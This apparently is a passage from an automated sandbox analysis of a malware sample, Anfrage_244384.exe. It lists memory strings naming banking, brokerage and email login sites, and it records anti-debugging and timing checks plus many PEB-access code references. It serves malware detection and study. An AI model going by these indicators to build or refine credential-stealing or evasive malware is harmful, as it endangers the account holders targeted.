Source: 02-E8420l.7.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: 02-E8420l.7.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: 02-E8420l.7.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: 02-E8420l.7.dr Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: 02-E8420l.7.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: 02-E8420l.7.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: 02-E8420l.7.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: verclsid.exe, 00000007.00000002.3365232559.0000000007752000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CDYNVMware20,116,)
Source: 02-E8420l.7.dr Binary or memory string: outlook.office.comVMware20,11696487552s
Source: 02-E8420l.7.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: 02-E8420l.7.dr Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: 02-E8420l.7.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: 02-E8420l.7.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: 02-E8420l.7.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: C:\Users\user\Desktop\Anfrage_244384.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\Anfrage_244384.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\verclsid.exe Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\verclsid.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_347416A6 rdtsc 4_2_347416A6
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346B35C0 NtCreateMutant,LdrInitializeThunk, 4_2_346B35C0
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 0_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA, 0_2_10001A5D
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_34671460 mov eax, dword ptr fs:[00000030h] 4_2_34671460
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_34671460 mov eax, dword ptr fs:[00000030h] 4_2_34671460
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_34671460 mov eax, dword ptr fs:[00000030h] 4_2_34671460
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_34671460 mov eax, dword ptr fs:[00000030h] 4_2_34671460
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_34671460 mov eax, dword ptr fs:[00000030h] 4_2_34671460
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3468F460 mov eax, dword ptr fs:[00000030h] 4_2_3468F460
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3468F460 mov eax, dword ptr fs:[00000030h] 4_2_3468F460
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3468F460 mov eax, dword ptr fs:[00000030h] 4_2_3468F460
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3468F460 mov eax, dword ptr fs:[00000030h] 4_2_3468F460
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3468F460 mov eax, dword ptr fs:[00000030h] 4_2_3468F460
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3468F460 mov eax, dword ptr fs:[00000030h] 4_2_3468F460
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3474547F mov eax, dword ptr fs:[00000030h] 4_2_3474547F
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3472F453 mov eax, dword ptr fs:[00000030h] 4_2_3472F453
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3471B450 mov eax, dword ptr fs:[00000030h] 4_2_3471B450
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3471B450 mov eax, dword ptr fs:[00000030h] 4_2_3471B450
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3471B450 mov eax, dword ptr fs:[00000030h] 4_2_3471B450
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3471B450 mov eax, dword ptr fs:[00000030h] 4_2_3471B450
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3467B440 mov eax, dword ptr fs:[00000030h] 4_2_3467B440
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3467B440 mov eax, dword ptr fs:[00000030h] 4_2_3467B440
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3467B440 mov eax, dword ptr fs:[00000030h] 4_2_3467B440
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3467B440 mov eax, dword ptr fs:[00000030h] 4_2_3467B440
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3467B440 mov eax, dword ptr fs:[00000030h] 4_2_3467B440
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3467B440 mov eax, dword ptr fs:[00000030h] 4_2_3467B440
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3469340D mov eax, dword ptr fs:[00000030h] 4_2_3469340D
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346F7410 mov eax, dword ptr fs:[00000030h] 4_2_346F7410
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_347414F6 mov eax, dword ptr fs:[00000030h] 4_2_347414F6
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_347414F6 mov eax, dword ptr fs:[00000030h] 4_2_347414F6
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_347194E0 mov eax, dword ptr fs:[00000030h] 4_2_347194E0
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_347454DB mov eax, dword ptr fs:[00000030h] 4_2_347454DB
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346674B0 mov eax, dword ptr fs:[00000030h] 4_2_346674B0
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346674B0 mov eax, dword ptr fs:[00000030h] 4_2_346674B0
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346A34B0 mov eax, dword ptr fs:[00000030h] 4_2_346A34B0
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_34679486 mov eax, dword ptr fs:[00000030h] 4_2_34679486
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_34679486 mov eax, dword ptr fs:[00000030h] 4_2_34679486
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3466B480 mov eax, dword ptr fs:[00000030h] 4_2_3466B480
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3466B562 mov eax, dword ptr fs:[00000030h] 4_2_3466B562
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346AB570 mov eax, dword ptr fs:[00000030h] 4_2_346AB570
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346AB570 mov eax, dword ptr fs:[00000030h] 4_2_346AB570
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3471B550 mov eax, dword ptr fs:[00000030h] 4_2_3471B550
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3471B550 mov eax, dword ptr fs:[00000030h] 4_2_3471B550
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3471B550 mov eax, dword ptr fs:[00000030h] 4_2_3471B550
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_34745537 mov eax, dword ptr fs:[00000030h] 4_2_34745537
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3467D534 mov eax, dword ptr fs:[00000030h] 4_2_3467D534
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3467D534 mov eax, dword ptr fs:[00000030h] 4_2_3467D534
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3467D534 mov eax, dword ptr fs:[00000030h] 4_2_3467D534
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3467D534 mov eax, dword ptr fs:[00000030h] 4_2_3467D534
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3467D534 mov eax, dword ptr fs:[00000030h] 4_2_3467D534
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3467D534 mov eax, dword ptr fs:[00000030h] 4_2_3467D534
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3471F525 mov eax, dword ptr fs:[00000030h] 4_2_3471F525
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3471F525 mov eax, dword ptr fs:[00000030h] 4_2_3471F525
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3471F525 mov eax, dword ptr fs:[00000030h] 4_2_3471F525
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3471F525 mov eax, dword ptr fs:[00000030h] 4_2_3471F525
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3471F525 mov eax, dword ptr fs:[00000030h] 4_2_3471F525
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3471F525 mov eax, dword ptr fs:[00000030h] 4_2_3471F525
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3471F525 mov eax, dword ptr fs:[00000030h] 4_2_3471F525
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346AD530 mov eax, dword ptr fs:[00000030h] 4_2_346AD530
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346AD530 mov eax, dword ptr fs:[00000030h] 4_2_346AD530
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3472B52F mov eax, dword ptr fs:[00000030h] 4_2_3472B52F
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346A7505 mov eax, dword ptr fs:[00000030h] 4_2_346A7505
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346A7505 mov ecx, dword ptr fs:[00000030h] 4_2_346A7505
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346915F4 mov eax, dword ptr fs:[00000030h] 4_2_346915F4
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346915F4 mov eax, dword ptr fs:[00000030h] 4_2_346915F4
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346915F4 mov eax, dword ptr fs:[00000030h] 4_2_346915F4
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346915F4 mov eax, dword ptr fs:[00000030h] 4_2_346915F4
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346915F4 mov eax, dword ptr fs:[00000030h] 4_2_346915F4
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346915F4 mov eax, dword ptr fs:[00000030h] 4_2_346915F4
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_347435D7 mov eax, dword ptr fs:[00000030h] 4_2_347435D7
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_347435D7 mov eax, dword ptr fs:[00000030h] 4_2_347435D7
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_347435D7 mov eax, dword ptr fs:[00000030h] 4_2_347435D7
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346A55C0 mov eax, dword ptr fs:[00000030h] 4_2_346A55C0
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346995DA mov eax, dword ptr fs:[00000030h] 4_2_346995DA
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_347455C9 mov eax, dword ptr fs:[00000030h] 4_2_347455C9
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346ED5D0 mov eax, dword ptr fs:[00000030h] 4_2_346ED5D0
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346ED5D0 mov ecx, dword ptr fs:[00000030h] 4_2_346ED5D0
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346915A9 mov eax, dword ptr fs:[00000030h] 4_2_346915A9
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346915A9 mov eax, dword ptr fs:[00000030h] 4_2_346915A9
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346915A9 mov eax, dword ptr fs:[00000030h] 4_2_346915A9
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346915A9 mov eax, dword ptr fs:[00000030h] 4_2_346915A9
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346915A9 mov eax, dword ptr fs:[00000030h] 4_2_346915A9
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3470D5B0 mov eax, dword ptr fs:[00000030h] 4_2_3470D5B0
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3470D5B0 mov eax, dword ptr fs:[00000030h] 4_2_3470D5B0
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_347435B6 mov eax, dword ptr fs:[00000030h] 4_2_347435B6
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_347035BA mov eax, dword ptr fs:[00000030h] 4_2_347035BA
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_347035BA mov eax, dword ptr fs:[00000030h] 4_2_347035BA
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_347035BA mov eax, dword ptr fs:[00000030h] 4_2_347035BA
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_347035BA mov eax, dword ptr fs:[00000030h] 4_2_347035BA
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3472F5BE mov eax, dword ptr fs:[00000030h] 4_2_3472F5BE
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3469F5B0 mov eax, dword ptr fs:[00000030h] 4_2_3469F5B0
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3469F5B0 mov eax, dword ptr fs:[00000030h] 4_2_3469F5B0
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3469F5B0 mov eax, dword ptr fs:[00000030h] 4_2_3469F5B0
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3469F5B0 mov eax, dword ptr fs:[00000030h] 4_2_3469F5B0
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3469F5B0 mov eax, dword ptr fs:[00000030h] 4_2_3469F5B0
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3469F5B0 mov eax, dword ptr fs:[00000030h] 4_2_3469F5B0
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3469F5B0 mov eax, dword ptr fs:[00000030h] 4_2_3469F5B0
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3469F5B0 mov eax, dword ptr fs:[00000030h] 4_2_3469F5B0
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3469F5B0 mov eax, dword ptr fs:[00000030h] 4_2_3469F5B0
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3466758F mov eax, dword ptr fs:[00000030h] 4_2_3466758F
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3466758F mov eax, dword ptr fs:[00000030h] 4_2_3466758F
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3466758F mov eax, dword ptr fs:[00000030h] 4_2_3466758F
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346FB594 mov eax, dword ptr fs:[00000030h] 4_2_346FB594
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346FB594 mov eax, dword ptr fs:[00000030h] 4_2_346FB594
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346A9660 mov eax, dword ptr fs:[00000030h] 4_2_346A9660
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346A9660 mov eax, dword ptr fs:[00000030h] 4_2_346A9660
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3470D660 mov eax, dword ptr fs:[00000030h] 4_2_3470D660
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3466F626 mov eax, dword ptr fs:[00000030h] 4_2_3466F626
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_34745636 mov eax, dword ptr fs:[00000030h] 4_2_34745636
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346AF603 mov eax, dword ptr fs:[00000030h] 4_2_346AF603
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346A1607 mov eax, dword ptr fs:[00000030h] 4_2_346A1607
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_34673616 mov eax, dword ptr fs:[00000030h] 4_2_34673616
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3472D6F0 mov eax, dword ptr fs:[00000030h] 4_2_3472D6F0
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346A36EF mov eax, dword ptr fs:[00000030h] 4_2_346A36EF
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3469D6E0 mov eax, dword ptr fs:[00000030h] 4_2_3469D6E0
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_347036EE mov eax, dword ptr fs:[00000030h] 4_2_347036EE
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346A16CF mov eax, dword ptr fs:[00000030h] 4_2_346A16CF
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3467B6C0 mov eax, dword ptr fs:[00000030h] 4_2_3467B6C0
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3472F6C7 mov eax, dword ptr fs:[00000030h] 4_2_3472F6C7
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_347316CC mov eax, dword ptr fs:[00000030h] 4_2_347316CC
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3466D6AA mov eax, dword ptr fs:[00000030h] 4_2_3466D6AA
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346676B2 mov eax, dword ptr fs:[00000030h] 4_2_346676B2
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346F368C mov eax, dword ptr fs:[00000030h] 4_2_346F368C
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3466B765 mov eax, dword ptr fs:[00000030h] 4_2_3466B765
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_34683740 mov eax, dword ptr fs:[00000030h] 4_2_34683740
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3471375F mov eax, dword ptr fs:[00000030h] 4_2_3471375F
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_34743749 mov eax, dword ptr fs:[00000030h] 4_2_34743749
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_34673720 mov eax, dword ptr fs:[00000030h] 4_2_34673720
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3474B73C mov eax, dword ptr fs:[00000030h] 4_2_3474B73C
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3468F720 mov eax, dword ptr fs:[00000030h] 4_2_3468F720
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_34669730 mov eax, dword ptr fs:[00000030h] 4_2_34669730
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3473972B mov eax, dword ptr fs:[00000030h] 4_2_3473972B
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3472F72E mov eax, dword ptr fs:[00000030h] 4_2_3472F72E
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3467973A mov eax, dword ptr fs:[00000030h] 4_2_3467973A
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346A5734 mov eax, dword ptr fs:[00000030h] 4_2_346A5734
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_34677703 mov eax, dword ptr fs:[00000030h] 4_2_34677703
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_34675702 mov eax, dword ptr fs:[00000030h] 4_2_34675702
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346AF71F mov eax, dword ptr fs:[00000030h] 4_2_346AF71F
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3467D7E0 mov ecx, dword ptr fs:[00000030h] 4_2_3467D7E0
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346757C0 mov eax, dword ptr fs:[00000030h] 4_2_346757C0
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346FF7AF mov eax, dword ptr fs:[00000030h] 4_2_346FF7AF
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_347437B6 mov eax, dword ptr fs:[00000030h] 4_2_347437B6
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3472D7B0 mov eax, dword ptr fs:[00000030h] 4_2_3472D7B0
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346F97A9 mov eax, dword ptr fs:[00000030h] 4_2_346F97A9
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3469D7B0 mov eax, dword ptr fs:[00000030h] 4_2_3469D7B0
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3466F7BA mov eax, dword ptr fs:[00000030h] 4_2_3466F7BA
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3472F78A mov eax, dword ptr fs:[00000030h] 4_2_3472F78A
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346F106E mov eax, dword ptr fs:[00000030h] 4_2_346F106E
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_34745060 mov eax, dword ptr fs:[00000030h] 4_2_34745060
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_34681070 mov eax, dword ptr fs:[00000030h] 4_2_34681070
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_34681070 mov ecx, dword ptr fs:[00000030h] 4_2_34681070
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346ED070 mov ecx, dword ptr fs:[00000030h] 4_2_346ED070
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3471705E mov ebx, dword ptr fs:[00000030h] 4_2_3471705E
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3471705E mov eax, dword ptr fs:[00000030h] 4_2_3471705E
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3469B052 mov eax, dword ptr fs:[00000030h] 4_2_3469B052
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3473903E mov eax, dword ptr fs:[00000030h] 4_2_3473903E
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346950E4 mov eax, dword ptr fs:[00000030h] 4_2_346950E4
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346950E4 mov ecx, dword ptr fs:[00000030h] 4_2_346950E4
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346870C0 mov eax, dword ptr fs:[00000030h] 4_2_346870C0
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346870C0 mov ecx, dword ptr fs:[00000030h] 4_2_346870C0
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_347450D9 mov eax, dword ptr fs:[00000030h] 4_2_347450D9
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346ED0C0 mov eax, dword ptr fs:[00000030h] 4_2_346ED0C0
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346990DB mov eax, dword ptr fs:[00000030h] 4_2_346990DB
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3466D08D mov eax, dword ptr fs:[00000030h] 4_2_3466D08D
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346FD080 mov eax, dword ptr fs:[00000030h] 4_2_346FD080
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346FD080 mov eax, dword ptr fs:[00000030h] 4_2_346FD080
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_34675096 mov eax, dword ptr fs:[00000030h] 4_2_34675096
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346A909C mov eax, dword ptr fs:[00000030h] 4_2_346A909C
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3469D090 mov eax, dword ptr fs:[00000030h] 4_2_3469D090
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_34709179 mov eax, dword ptr fs:[00000030h] 4_2_34709179
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3466F172 mov eax, dword ptr fs:[00000030h] 4_2_3466F172
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_34745152 mov eax, dword ptr fs:[00000030h] 4_2_34745152
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_34669148 mov eax, dword ptr fs:[00000030h] 4_2_34669148
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_34703140 mov eax, dword ptr fs:[00000030h] 4_2_34703140
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_34677152 mov eax, dword ptr fs:[00000030h] 4_2_34677152
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3466B136 mov eax, dword ptr fs:[00000030h] 4_2_3466B136
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_34671131 mov eax, dword ptr fs:[00000030h] 4_2_34671131
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346951EF mov eax, dword ptr fs:[00000030h] 4_2_346951EF
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_347171F9 mov esi, dword ptr fs:[00000030h] 4_2_347171F9
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346751ED mov eax, dword ptr fs:[00000030h] 4_2_346751ED
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_347431E1 mov eax, dword ptr fs:[00000030h] 4_2_347431E1
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346AD1D0 mov eax, dword ptr fs:[00000030h] 4_2_346AD1D0
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346AD1D0 mov ecx, dword ptr fs:[00000030h] 4_2_346AD1D0
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_347451CB mov eax, dword ptr fs:[00000030h] 4_2_347451CB
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_347211A4 mov eax, dword ptr fs:[00000030h] 4_2_347211A4
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3468B1B0 mov eax, dword ptr fs:[00000030h] 4_2_3468B1B0
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_34725180 mov eax, dword ptr fs:[00000030h] 4_2_34725180
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346C7190 mov eax, dword ptr fs:[00000030h] 4_2_346C7190
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3473D26B mov eax, dword ptr fs:[00000030h] 4_2_3473D26B
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346B1270 mov eax, dword ptr fs:[00000030h] 4_2_346B1270
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_34699274 mov eax, dword ptr fs:[00000030h] 4_2_34699274
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3472B256 mov eax, dword ptr fs:[00000030h] 4_2_3472B256
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_34669240 mov eax, dword ptr fs:[00000030h] 4_2_34669240
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346A724D mov eax, dword ptr fs:[00000030h] 4_2_346A724D
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346FD250 mov ecx, dword ptr fs:[00000030h] 4_2_346FD250
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_34745227 mov eax, dword ptr fs:[00000030h] 4_2_34745227
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346A7208 mov eax, dword ptr fs:[00000030h] 4_2_346A7208
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3471B2F0 mov eax, dword ptr fs:[00000030h] 4_2_3471B2F0
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3472F2F8 mov eax, dword ptr fs:[00000030h] 4_2_3472F2F8
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_347452E2 mov eax, dword ptr fs:[00000030h] 4_2_347452E2
